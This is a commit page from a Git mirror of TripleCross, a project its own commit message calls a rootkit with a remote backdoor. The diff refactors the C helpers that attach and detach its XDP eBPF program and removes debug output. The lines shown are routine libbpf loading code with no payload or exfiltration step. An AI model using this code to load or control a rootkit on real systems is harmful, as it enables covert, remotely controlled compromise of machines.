admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2025-12-28 20:23:08 +08:00
Code Issues Packages Projects Releases Wiki Activity

Capability of attaching/detaching as many times as we want is finished. Now rootkit is fully cusotmizable from the userland (and thus remotely throught the backdoor)

Browse Source
This commit is contained in:
h3xduck
2022-01-02 16:02:23 -05:00
parent adaf909781
commit 40da6b300b
4 changed files with 6 additions and 36 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
src/.output/xdp_filter.o
View File

Binary file not shown.

BIN
src/bin/xdp_filter
View File

Binary file not shown.

8
src/user/include/modules/xdp.h
View File

@@ -37,7 +37,8 @@ int attach_xdp_all(struct xdp_filter_bpf *skel, __u32 ifindex, __u32 flags){
// Attach loaded xdp program
skel->links.xdp_receive = bpf_program__attach_xdp(skel->progs.xdp_receive, ifindex);
err = libbpf_get_error(skel->links.xdp_receive);
err = libbpf_get_error(skel->links.xdp_receive);
if (err<0) {
fprintf(stderr, "Failed to attach XDP program\n");
return -1;
@@ -46,10 +47,9 @@ int attach_xdp_all(struct xdp_filter_bpf *skel, __u32 ifindex, __u32 flags){
return 0;
}
int detach_xdp_all(__u32 ifindex, __u32 fd, __u32 flags){
int err = bpf_set_link_xdp_fd(ifindex, fd, flags);
int detach_xdp_all(struct xdp_filter_bpf *skel){
int err = bpf_link__destroy(skel->links.xdp_receive);
if(err<0){
perror("j");
fprintf(stderr, "Failed to detach XDP program\n");
return -1;
}

34
src/user/xdp_filter.c
View File

@@ -228,45 +228,15 @@ int main(int argc, char**argv){
perror("ERR");
goto cleanup;
}
printf("A:%i", err);fflush(stdout);
detach_xdp_all(ifindex, -1, flags);
sleep(2);
err = attach_sched_all(skel);
detach_xdp_all(skel);
if(err<0){
perror("ERR");
goto cleanup;
}
printf("B:%i", err);fflush(stdout);
exiting = false;
while (!exiting) {
err = ring_buffer__poll(rb, 100 /* timeout, ms */);
//Checking if a signal occured
if (err == -EINTR) {
err = 0;
break;
}
if (err < 0) {
printf("Error polling ring buffer: %d\n", err);
break;
}
}
err = detach_sched_all(skel);
if(err<0){
perror("ERR");
goto cleanup;
}
printf("C:%i", err);fflush(stdout);
sleep(2);
cleanup:
ring_buffer__free(rb);
xdp_filter_bpf__destroy(skel);
//xdp_filter_bpf__destroy(skel);
return err < 0 ? -err : 0;